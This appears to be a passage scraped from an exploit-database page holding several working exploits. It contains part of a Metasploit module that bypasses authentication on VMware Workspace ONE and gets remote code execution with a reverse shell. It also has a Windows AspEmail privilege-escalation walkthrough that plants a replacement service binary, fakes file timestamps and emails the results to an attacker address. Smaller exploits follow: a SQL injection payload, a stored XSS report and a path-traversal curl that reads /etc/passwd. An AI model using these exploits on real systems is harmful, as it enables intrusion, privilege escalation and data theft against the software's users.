Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-22956'],<br /> ['CVE', '2022-22957'],<br /> ['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'],<br /> ['URL', 'https://github.com/sourceincite/hekate/'],<br /> ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html']<br /> ],<br /> 'DisclosureDate' => '2022-04-06',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => %i[curl wget],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x22"<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'LPORT' => 5555<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> # The VMware products affected do no expose any version information to unauthenticated users.<br /> # Attempt to exploit the auth bypass to determine if the target is vulnerable. Both the auth bypass and RCE were<br /> # patched in the following VMware update: https://kb.vmware.com/s/article/88099<br /> def check<br /> @token = get_authentication_token<br /> Exploit::CheckCode::Vulnerable('Successfully by-passed authentication by exploiting CVE-2022-22956')<br /> rescue InvalidRequest, InvalidResponse => e<br /> return Exploit::CheckCode::Safe("There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> end<br /><br /> # Exploit OAuth2TokenResourceController ACS Authentication Bypass (CVE-2022-22956).<br /> #<br /> # Return the authentication token<br /> def get_authentication_token<br /> oauth_client = ['Service__OAuth2Client', 'acs'].sample<br /> res_activation_token = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'generateActivationToken', oauth_client),<br /> 'method' => 'POST'<br /> })<br /><br /> unless res_activation_token<br /> raise InvalidRequest, 'No response from the server when requesting an activation token'<br /> end<br /><br /> unless res_activation_token.code == 200 && res_activation_token.headers['content-type'] == 'application/json;charset=UTF-8'<br /> raise InvalidResponse, "Unexpected response code:#{res_activation_token.code}, when requesting an activation token"<br /> end<br /><br /> activation_token = res_activation_token.get_json_document['activationToken']<br /><br /> res_client_info = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'activate'),<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'data' => activation_token<br /> })<br /><br /> unless res_client_info<br /> raise InvalidRequest, 'No response from client when sending the activation token and expecting client info in return'<br /> end<br /><br /> unless res_client_info.code == 200 && res_client_info.headers['content-type'] == 'application/json;charset=UTF-8'<br /> raise InvalidResponse, "Unexpected response code:#{res_client_info.code}, when sending the activation token and expecting client info in return"<br /> end<br /><br /> json_client_info = res_client_info.get_json_document<br /> client_id = json_client_info['client_id']<br /> client_secret = json_client_info['client_secret']<br /><br /> print_good("Leaked client_id: #{client_id}")<br /> print_good("Leaked client_secret: #{client_secret}")<br /> post_data = "grant_type=client_credentials&client_id=#{client_id}&client_secret=#{client_secret}"<br /><br /> res_access_token = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'auth', 'oauthtoken'),<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'data' => post_data<br /> })<br /><br /> unless res_access_token<br /> raise InvalidRequest, 'No response from the server when requesting the access token'<br /> end<br /><br /> unless res_access_token.code == 200 && res_access_token.headers['content-type'] == 'application/json;charset=UTF-8' && res_access_token.get_json_document['access_token']<br /> raise InvalidResponse, 'Invalid response from the server when requesting the access token'<br /> end<br /><br /> res_access_token.get_json_document['access_token']<br /> end<br /><br /> # Serve the files for the target machine to download.<br /> # If the request to the server ends in .xml the victim is requesting the spring bean generated by payload_xml method.<br /> # If the request doesn't in .xml the victim is requesting the linux dropper payload.<br /> def on_request_uri(cli, request)<br /> vprint_status("on_request_uri - Request '#{request.method} #{request.uri}'")<br /> if request.to_s.include?('.xml')<br /> vprint_status('Sending XML response: ')<br /> send_response(cli, @payload_xml, { 'Content-Type' => 'application/octet-strem' })<br /> vprint_status('Response sent')<br /> else<br /> vprint_status('Sending PAYLOAD: ')<br /> send_response(cli, generate_payload_exe(code: payload.encoded), { 'Content-Type' => 'application/octet-strem' })<br /> end<br /> end<br /><br /> # Generates the malicious spring bean that will be hosted by the metasploit http server and downloaded and run by the victim<br /> #<br /> # Returns an XML document containing the payload.<br /> def generate_payload_xml(cmd)<br /> bean = ''<br /> builder = ::Builder::XmlMarkup.new(target: bean, indent: 2)<br /> builder.beans(xmlns: 'http://www.springframework.org/schema/beans', 'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance', 'xsi:schemaLocation': 'http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd') do<br /> builder.bean(id: 'pb', class: 'java.lang.ProcessBuilder', 'init-method': 'start') do<br /> builder.constructor do<br /> builder.list do<br /> builder.value('/bin/sh')<br /> builder.value('-c')<br /> builder.value(cmd)<br /> end<br /> end<br /> end<br /> end<br /><br /> bean.gsub!('constructor', 'constructor-arg')<br /> vprint_status(bean)<br /> bean<br /> end<br /><br /> # Calls the vulnerable dbCheck method in order to download and run the payload the module is hosting.<br /> def trigger_jdbc_rce(jwt, sub_cmd)<br /> # jdbc_uri = "jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{filename}"<br /> jdbc_uri = "jdbcUrl=jdbc%3Apostgresql%3A%2F%2Flocalhost%3A1337%2Fsaas%3FsocketFactory%3Dorg.springframework.context.support.FileSystemXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2F#{datastore['LHOST']}%3A#{datastore['SRVPORT']}%2F#{@payload_name}&dbUsername=&dbPassword"<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'system', 'dbCheck'),<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'Connection' => 'keep-alive',<br /> 'cookie' => "HZN=#{jwt}",<br /> 'data' => jdbc_uri<br /> })<br /><br /> fail_with(Failure::Unreachable, "No response from the request to trigger the following sub command: #{sub_cmd}") unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected response from the request to trigger the following sub command: #{sub_cmd}") unless res.code == 406 && res.body == '{"success":false,"status":406,"message":"database.connection.notSuccess","code":406}'<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> vprint_status("Executing the following command: #{cmd}")<br /> @payload_xml = generate_payload_xml(cmd)<br /> trigger_jdbc_rce(opts[:jwt], cmd)<br /> end<br /><br /> # Instruct the user to exploit CVE-2022-22960<br /> def on_new_session(_client)<br /> print_good('Now background this session with "bg" and then run "resource run_cve-2022-22960_lpe.rc" to get a root shell')<br /> end<br /><br /> def exploit<br /> unless @token<br /> begin<br /> @token = get_authentication_token<br /> rescue InvalidRequest => e<br /> fail_with(Failure::Unreachable, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> rescue InvalidResponse => e<br /> fail_with(Failure::UnexpectedReply, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> end<br /> end<br /><br /> @payload_name = Rex::Text.rand_text_alpha(4..12) + '.xml'<br /> start_service('Path' => "/#{@payload_name}")<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded, { jwt: @token })<br /> when :linux_dropper<br /> execute_cmdstager({ jwt: @token })<br /> else<br /> fail_with(Failure::BadConfig, 'Invalid target specified')<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>####################################################################################################################<br /># Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #<br /># Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #<br /># Date: 13/04/2023 #<br /># Exploit Author: Zer0FauLT [admindeepsec@proton.me] #<br /># Vendor Homepage: https://www.aspemail.com #<br /># Software Link: https://www.aspemail.com/download.html #<br /># Product: AspEmail #<br /># Version: AspEmail 5.6.0.2 and all #<br /># Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #<br /># Tested on: Windows Server 2016 and Windows Server 2019 #<br /># CVE : 0DAY #<br />####################################################################################################################<br /><br /># ==================================================================================================================<br /><br />[+] C:\PenTest>whoami /priv<br /><br /> PRIVILEGES INFORMATION<br /> ----------------------<br /><br /> Privilege Name Description State <br /> ============================= ========================================= ========<br /> SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled<br /> SeChangeNotifyPrivilege Bypass traverse checking Enabled <br /> SeImpersonatePrivilege Impersonate a client after authentication Enabled <br /> SeIncreaseWorkingSetPrivilege Increase a process working set Disabled<br /> <br /># ==================================================================================================================<br /><br />* First, we will test whether the AspEmail service is active.<br />* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:<br /><br />[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe<br /> EmailAgent.exe 4400 Persits Software EmailAgent<br /><br /> or <br /><br />[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe<br /> EmailAgent64.exe 4400 Persits Software EmailAgent<br /> <br />* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". <br />* Now we know that AspEmail service is active.<br /><br /># ==================================================================================================================<br /><br />* We will need these:<br /><br />[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit<br />[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"<br />[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"<br />[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"<br />[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"<br /><br /># ==================================================================================================================<br /> <br />[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"<br /><br /> Name: Persits Software EmailAgent<br /> ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email<br /> Agent.exe" /run<br /> User : LocalSystem<br /> ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN<br /> IdentityReference : Everyone<br /> Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, <br /> AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, <br /> ReadExtendedAttributes, DeleteChild, Execute/Traverse<br /> Status : Unknown<br /> UserCanStart : False<br /> UserCanStop : False<br /> <br />[+] C:\PenTest>del PrivescCheck.ps1<br /><br />* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.<br /><br /># ================================================================================================================== #<br /><br />[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"<br /><br /> Successfully processed 0 files; Failed processing 1 files<br /> C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.<br /><br />* We do not have permission to access subdirectories.<br /><br /># ==================================================================================================================<br /><br />[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"<br /><br /> C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)<br /> DeepSecLab\psacln:(I)(OI)(CI)(N)<br /> DeepSecLab\psaadm:(I)(OI)(CI)(N)<br /> DeepSecLab\psaadm_users:(I)(OI)(CI)(N)<br /> BUILTIN\Administrators:(I)(F)<br /> CREATOR OWNER:(I)(OI)(CI)(IO)(F)<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)<br /> NT SERVICE\TrustedInstaller:(I)(CI)(F)<br /> NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)<br /> BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)<br /> BUILTIN\Users:(I)(OI)(CI)(RX)<br /> APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)<br /> <br />* Unlike other directories, we have full privileges in the "BIN" directory of the service. <br />* This is chmod 0777 - rwxrwxrwx in linux language.<br /> <br /># ==================================================================================================================<br /> <br />[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID<br /><br /> __PATH <br /><br /> \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" <br /><br /> \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"<br /> root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16<br /> [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators<br /><br />* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.<br /><br /># ==================================================================================================================<br /><br />* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.<br /><br />[+] C:\PenTest>whoami<br /> DeepSecLab\Hacker<br /><br />[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"<br /> SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".<br /> <br />[+] C:\PenTest>"C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F<br /><br /> processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN<br /> Successfully processed 1 files; Failed processing 0 files<br /> <br />* Ok. All commands resulted successfully. We now have full privileges for this directory. <br /> <br /># ==================================================================================================================<br /><br />* Now we will modify the EmailAgent file and inject a self-written malware. <br />* We will be careful not to damage any files while doing this so that all transactions can be easily undone.<br /><br />[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe<br />[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe<br /><br /># ==================================================================================================================<br /><br />[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir<br /> Volume in drive C has no label.<br /> Volume Serial Number is 0C8A-5291<br /><br /> Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin<br /><br /> 14.04.2023 16:47 <DIR> .<br /> 14.04.2023 16:47 <DIR> ..<br /> 01.03.2004 15:55 143.360 AspEmail.dll<br /> 25.02.2004 16:23 188.416 AspUpload.dll<br /> 13.04.2023 22:00 12.288 EmailAgent.exe <<<=== Renamed for EmailAgentPrivESC.exe<br /> 24.09.2003 09:22 139.264 EmailAgentCfg.cpl<br /> 24.09.2003 09:25 94.208 EmailLogger.dll<br /> 24.09.2003 09:21 167.936 Null.EmailAgent.exe<br /> 6 File(s) 745.472 bytes<br /> 2 Dir(s) 165.936.717.824 bytes free<br /> <br /># ==================================================================================================================<br /><br />* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.<br /><br />[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"<br />[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe<br /><br /># ==================================================================================================================<br /><br />[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir<br /> Volume in drive C has no label.<br /> Volume Serial Number is 0C8A-5291<br /><br /> Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin<br /><br /> 14.04.2023 16:47 <DIR> .<br /> 14.04.2023 16:47 <DIR> ..<br /> 01.03.2004 15:55 143.360 AspEmail.dll<br /> 25.02.2004 16:23 188.416 AspUpload.dll<br /> 24.09.2003 09:21 12.288 EmailAgent.exe<br /> 24.09.2003 09:22 139.264 EmailAgentCfg.cpl<br /> 24.09.2003 09:25 94.208 EmailLogger.dll<br /> 24.09.2003 09:21 167.936 Null.EmailAgent.exe<br /> 6 File(s) 745.472 bytes<br /> 2 Dir(s) 165.936.717.824 bytes free<br /> <br /> [24.09.2003 09:21] 12.288 EmailAgent.exe<br /> [24.09.2003 09:21] 167.936 Null.EmailAgent.exe<br /> <br />* And time manipulation is over. They look like they were uploaded at the same time long ago.<br /><br /># ==================================================================================================================<br /><br />* Now we check for my malware ownership.<br /><br />[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID<br /><br /> __PATH <br /><br /> \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" <br /><br /> \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28<br /> <br />[+] wmic useraccount where sid="S-1-5-21-3674093405-176013069-2091862131-1511" get name<br /><br /> Name <br /><br /> DeepSecLab\Hacker <br /><br /> EmailAgent.exe Owner: DeepSecLab\Hacker<br /><br /># =================================================================================================================#<br /># #<br />####################################################################################################################<br /># #[EmailAgent.exe]# #<br />####################################################################################################################<br /># # <br /> #<br />* We program this malware in such a way that when the server is reboot(when the services are restarted), #<br />* It will be triggered and execute the codes we want, #<br />* And then send a printout of all this to the email address we specified. #<br /> #<br /> using System; #<br /> using System.Linq; #<br /> using System.Text; #<br /> using System.Diagnostics; #<br /> using System.IO; #<br /> using System.Collections; #<br /> #<br /> namespace CliToolSpace #<br /> { #<br /> class _Main #<br /> { #<br /> static void Main(string[] args) #<br /> { #<br /> Cli commandLine = new Cli(); #<br /> commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #<br /> commandLine.Execute(); #<br /> commandLine.ToFile(@"C:\Windows\Temp\"); #<br /> } #<br /> } #<br /> } #<br /> #<br /># #<br />####################################################################################################################<br /># #[Mail.exe]# #<br />####################################################################################################################<br /># #<br /> #<br /> using System; #<br /> using System.Net.Mail; #<br /> using System.Net; #<br /> SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #<br /> var mail = new MailMessage(); #<br /> mail.From = new MailAddress("mail@deepseclab.com"); #<br /> mail.To.Add("mail@hacker.com"); #<br /> mail.Subject = "Trigger Successful!"; #<br /> mail.IsBodyHtml = true; #<br /> string htmlBody; #<br /> htmlBody = "<strong>This server has been rebooted.</strong>"; #<br /> mail.Body = htmlBody; #<br /> Attachment attachment; #<br /> attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #<br /> mail.Attachments.Add(attachment); #<br /> SmtpServer.Port = 587; #<br /> SmtpServer.UseDefaultCredentials = false; #<br /> SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); #<br /> SmtpServer.EnableSsl = true; #<br /> SmtpServer.Timeout = int.MaxValue; #<br /> SmtpServer.Send(mail); #<br /> #<br /># #<br />####################################################################################################################<br /># #[Run.bat]# #<br />####################################################################################################################<br /># #<br /> #<br /> whoami > C:\Windows\Temp\Export.txt #<br /> cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #<br /> del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #<br /> cd c:\Windows\Tasks #<br /> del Run.bat & del Mail.exe #<br /> #<br /># #<br />####################################################################################################################<br /># #<br /> [+]Trigger Successful![+] #<br /> #<br />[+] C:\PenTest>systeminfo | findstr "Boot Time" #<br /> System Boot Time: 13.04.2022, 07:46:06 #<br /> #<br /># #<br />####################################################################################################################<br /> #[Export.txt]# #<br />####################################################################################################################<br /># #<br /> #<br /> NT AUTHORITY\SYSTEM #<br /> #<br /># #<br />####################################################################################################################<br /># # <br /># ==================================================================================================================<br /># ...|||[FIX]|||... #<br /># ==================================================================================================================<br /># [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #<br /># =================================================================================================================#<br /><br />[+] C:\Administrator>sc qc "Persits Software EmailAgent"<br /> [SC] QueryServiceConfig SUCCESS<br /><br /> SERVICE_NAME: Persits Software EmailAgent<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Persits Software EmailAgent<br /> DEPENDENCIES : rpcss<br /> SERVICE_START_NAME : LocalSystem<br /><br /># ==================================================================================================================<br /><br />[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"<br /><br /> D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)<br /><br /># ==================================================================================================================<br /><br />[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula<br /><br /> Accesschk v6.15 - Reports effective permissions for securable objects<br /> Copyright (C) 2006-2022 Mark Russinovich<br /> Sysinternals - www.sysinternals.com<br /><br /> Persits Software EmailAgent<br /> Medium Mandatory Level (Default) [No-Write-Up]<br /> RW NT AUTHORITY\SYSTEM<br /> SERVICE_ALL_ACCESS<br /> RW BUILTIN\Administrators<br /> SERVICE_ALL_ACCESS<br /> <br /># ==================================================================================================================<br /><br />[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET<br /><br />[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"<br /><br /> Successfully processed 0 files; Failed processing 1 files<br /> C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.<br /><br /> DONE!<br /><br /># ==================================================================================================================<br /><br />[+] C:\Administrator>sc stop "Persits Software EmailAgent"<br /><br />[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"<br /><br />* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.<br /><br /># ==================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection<br /># Date: 2023-04-02<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage:<br />https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html<br /># Software Link:<br />https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip<br /># Version: 1.0<br /># Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53<br /># CVE: CVE-2023-29849<br /><br />*Affected Parameters:*<br />btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],<br />itemqty[], btnMenuItemID<br /><br />*Steps to Reproduce:*<br />1. First login your staff panel.<br />2. then go to "order" menu and Select menu then create order and intercept<br />request data using burp suite.<br />so your request data will be:<br /><br />POST /bangresto/staff/displayitem.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/111.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 194<br />Origin: http://127.0.0.1<br />Referer: http://127.0.0.1/bangresto/staff/order.php<br />Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5<br />Connection: close<br /><br />btnMenuItemID=1&qty=1<br /><br />3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based<br />SQL Injection use this query ".1 union select<br />1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())--<br />-" in "btnMenuItemID" parameter.<br />4. Check browser you will see user, database and version informations.<br /></code></pre>
<pre><code># Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)<br /># Date: 2023-04-02<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage:<br />https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html<br /># Software Link:<br />https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip<br /># Version: 1.0<br /># Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53<br /># CVE: CVE-2023-29848<br /><br />*Steps to Reproduce:*<br />1. First login to your admin panel.<br />2. then go to Menu section and click add new menu from group.<br />your request data will be:<br /><br />POST /bangresto/admin/menu.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/111.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 87<br />Origin: http://127.0.0.1<br />Referer: http://127.0.0.1/bangresto/admin/menu.php<br />Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6<br />Connection: close<br /><br />itemName=test&itemPrice=1&menuID=1&addItem=<br /><br />3. Then use any XSS Payload in "itemName" parameter and click add.<br />4. You will see XSS pop up.<br /></code></pre>
<pre><code># Exploit Title: GDidees CMS - 'imgdownload.php' Local File Disclosure<br /># Date : 03/27/2023<br /># Exploit Author : Hadi Mene<br /># Vendor Homepage : https://www.gdidees.eu/<br /># Software Link : https://www.gdidees.eu/cms-1-0.html<br /># Version : 3.9.1 and earlier <br /># Tested on : Debian 11 <br /># CVE : CVE-2023-27179<br /><br />### Summary:<br /><br />GDidees CMS v3.9.1 and lower versions was discovered to contain an local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.<br /><br /><br />### Description :<br /><br />Imgdownload.php is mainly used by the QR code generation module to download an QR code. <br />The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized.<br />Furthermore, there is no admin session check in this code as it should since only the admin user should normally<br />be able to download QR code.<br /><br />Vulnerable Code :<br /><br />3. if (isset($_GET["filename"])) {<br />4. $filename=$_GET["filename"];<br /> .....<br /> .....<br />27. @readfile($filename) OR die();<br /><br /><br />### POC :<br /><br />URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd<br /><br />Exploitation using curl <br /># curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd<br /><br />root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br />irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br 